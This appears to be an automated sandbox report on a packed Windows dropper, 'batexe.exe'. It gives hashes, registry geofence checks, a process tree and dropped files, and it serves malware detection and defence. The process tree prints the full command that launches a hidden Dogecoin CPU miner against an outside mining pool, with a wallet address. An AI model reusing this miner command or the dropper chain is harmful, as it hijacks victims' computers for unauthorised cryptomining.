73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
298s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13-02-2024 17:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1408	b2e.exe
1120	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1120	cpuminer-sse2.exe
1120	cpuminer-sse2.exe
1120	cpuminer-sse2.exe
1120	cpuminer-sse2.exe
1120	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1384-7-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1384 wrote to memory of 1408	1384	batexe.exe	84
PID 1384 wrote to memory of 1408	1384	batexe.exe	84
PID 1384 wrote to memory of 1408	1384	batexe.exe	84
PID 1408 wrote to memory of 2152	1408	b2e.exe	85
PID 1408 wrote to memory of 2152	1408	b2e.exe	85
PID 1408 wrote to memory of 2152	1408	b2e.exe	85
PID 2152 wrote to memory of 1120	2152	cmd.exe	88
PID 2152 wrote to memory of 1120	2152	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1384
- C:\Users\Admin\AppData\Local\Temp\AB05.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\AB05.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\AB05.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B5A4.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2152
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1120

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AB05.tmp\b2e.exe

Filesize
4.7MB

MD5
b164718263ea0944b2d5a0cc33ac57ba

SHA1
7f4c060148ed1c9c0a93d660409ba181385eb692

SHA256
498ce260aac53e4febdc61e8dc9ae5a2a7026633bf807102ba523489866ccb44

SHA512
5e6e0f9bdf82324839957ce3719fec0a1b89399f004b018dd326d6cd15e435270b5ccfabb47fc6452d75c200442021b3bcbdbaaca6415eaf6ace4fdf8d78fbc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\AB05.tmp\b2e.exe

Filesize
1.4MB

MD5
fe4bc2bb4397eea601e0fa6c45cc20c6

SHA1
35477fc0a38f9db357a70f9b0573537fca582a9b

SHA256
8852fb3a8294753e6b088d458547feaf54685068ed6bc0dece93f608ab44afa7

SHA512
3759f54232069d2efba631954ff86bbf5ef58a616e4e0109c9ad5fcd632ee97ddf169ebddbe58237dbee36951c8d2e176312abe4e142f636398bff8fc2973bbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\AB05.tmp\b2e.exe

Filesize
832KB

MD5
e1bd95ac3f9c6ce43914de2a53967fee

SHA1
3e03982c075df051d5a8dd837f42873f30483faf

SHA256
45c3475b58fbaa942be0297167c5c3fbbfe7295aa3fcbb4fb61df1348f55c550

SHA512
2166424e86301bbe04fbcce5d0b91562248845c5b1a7e889fee9a95d1c872dd6ea5cc85792b54e6d085095339be2f2b7f30cfd9b40a071b51c96a5009cc96f00

Download Submit
C:\Users\Admin\AppData\Local\Temp\B5A4.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
64KB

MD5
e7317a0a343dc63f3fa3bf9ca6e93ff0

SHA1
0d48881feb76cf81fc46614bebfa3c134cada128

SHA256
277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

SHA512
84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
256KB

MD5
11e8812bfa1d698cdeb73a16c1d7c963

SHA1
e8708fd452ab5946b380d0c353ac26acf289e548

SHA256
e0f9ddf8afd30511763f0cf792369e32c955f15d9529c00c5fe9298a80d74402

SHA512
fd54c9c6f3520b2ced6b42235ebfce6d8b622c53f1fbf810baace657a7d44430968b5ff90cd1d860dbdf7550dd8cd467636c862ff0dd0832f25145efccc7731e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
115KB

MD5
ab6c8fa29ab83605d108b4b658b2e50c

SHA1
cf79c820530e0b4026b10c719ea9f18b2f02d64e

SHA256
b58919862b734dc6ec5cfdbc9eb6368805853e264fbe009835ffa7c7293c4510

SHA512
bc86325d2c7d771335076c32ba1c1dc06d9dda944a081dbd35094c817edc31fbd1c9ea90623739ea8055834c0220c1b939949966662c106d77af4e4f472a9afe

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
190KB

MD5
2137239c348fd76da12b8b46b89b9cd6

SHA1
3cfd053a86092abc5d37a9ccfef37c305923fd4e

SHA256
72d2212e1d68858ed26dbaeaca565ed60144802b2fe8018745f111bb0176a467

SHA512
5053239c188ec14ba72fdeacb484ff76859421bcc289b28058dca5fbdc6d1d39a66382c5ffa75d6df0f16b555bd29820435f5af5ace867158775b541ffdeac66

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
64KB

MD5
e98583e2f3157ea2561f40a91a79b195

SHA1
770932f48dbea7a78a3b21e3df65e329a27313ff

SHA256
f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2

SHA512
cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
128KB

MD5
8d949f4e279a9a80f50d7c2e0c7bff36

SHA1
92e29300716211895b2d8cd4cf010452f0132152

SHA256
2e87614d15e62262c8b0a0c65e302b15e971b591469f3c679e7e516934cf621f

SHA512
36565dc0a3290ac8c5e0fd0a2756764ce8e49a7ef52a437caad549c7ea1ac3ac7dfe05cd4951ed6b17051768fd9733c94365d85832092c429b0b74ab62a338fb

Download Submit
memory/1120-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-53-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1120-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1120-47-0x00000000010E0000-0x0000000002995000-memory.dmp

Filesize
24.7MB

Download
memory/1120-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-45-0x00000000758A0000-0x0000000075938000-memory.dmp

Filesize
608KB

Download
memory/1120-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1120-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1384-7-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1408-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1408-58-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download